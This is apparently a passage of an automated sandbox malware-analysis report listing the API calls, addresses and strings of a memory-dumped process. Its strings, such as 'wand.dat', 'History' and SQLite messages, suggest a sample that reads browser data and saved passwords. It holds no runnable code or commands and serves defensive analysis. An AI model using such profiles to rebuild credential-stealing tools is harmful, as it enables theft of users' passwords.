                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2308052813-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PathTemp$??3@
                                                                                                                • String ID: %s\etilqs_$etilqs_
                                                                                                                • API String ID: 1589464350-1420421710
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040FDD5
                                                                                                                  • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • wcscpy.MSVCRT ref: 0041477F
                                                                                                                • wcscpy.MSVCRT ref: 0041479A
                                                                                                                • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                • String ID: General
                                                                                                                • API String ID: 999786162-26480598
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: foreign key constraint failed$new$oid$old
                                                                                                                • API String ID: 0-1953309616
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                • API String ID: 3510742995-272990098
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset
                                                                                                                • String ID: gj
                                                                                                                • API String ID: 1297977491-4203073231
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                • malloc.MSVCRT ref: 004174BD
                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2903831945-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 0040D453
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4247780290-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                • memset.MSVCRT ref: 004450CD
                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                                                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1471605966-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • wcscpy.MSVCRT ref: 0044475F
                                                                                                                • wcscat.MSVCRT ref: 0044476E
                                                                                                                • wcscat.MSVCRT ref: 0044477F
                                                                                                                • wcscat.MSVCRT ref: 0044478E
                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                • String ID: \StringFileInfo\
                                                                                                                • API String ID: 102104167-2245444037
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$??3@
                                                                                                                • String ID: g4@
                                                                                                                • API String ID: 3314356048-2133833424
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memicmpwcslen
                                                                                                                • String ID: @@@@$History
                                                                                                                • API String ID: 1872909662-685208920
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004100FB
                                                                                                                • memset.MSVCRT ref: 00410112
                                                                                                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                • _snwprintf.MSVCRT ref: 00410141
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                • String ID: </%s>
                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040D58D
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                • String ID: MS Sans Serif
                                                                                                                • API String ID: 210187428-168460110
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName_wcsicmpmemset
                                                                                                                • String ID: edit
                                                                                                                • API String ID: 2747424523-2167791130
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                • API String ID: 3150196962-1506664499
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 3384217055-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$memcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 368790112-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                • String ID:
                                                                                                                • API String ID: 1889144086-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                • String ID:
                                                                                                                • API String ID: 1661045500-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                • memcpy.MSVCRT ref: 0042EC7A
                                                                                                                Strings
                                                                                                                • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset
                                                                                                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                • API String ID: 1297977491-2063813899
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040560C
                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                • String ID: *.*$dat$wand.dat
                                                                                                                • API String ID: 2618321458-1828844352
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                • wcslen.MSVCRT ref: 00410C74
                                                                                                                • _wtoi.MSVCRT ref: 00410C80
                                                                                                                • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1549203181-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00412057
                                                                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3550944819-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                                • memcpy.MSVCRT ref: 0040A94F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3023356884-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                                                • memcpy.MSVCRT ref: 0040B248
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$memcpy$mallocwcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3023356884-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: @
                                                                                                                • API String ID: 3510742995-2766056989
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1865533344-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
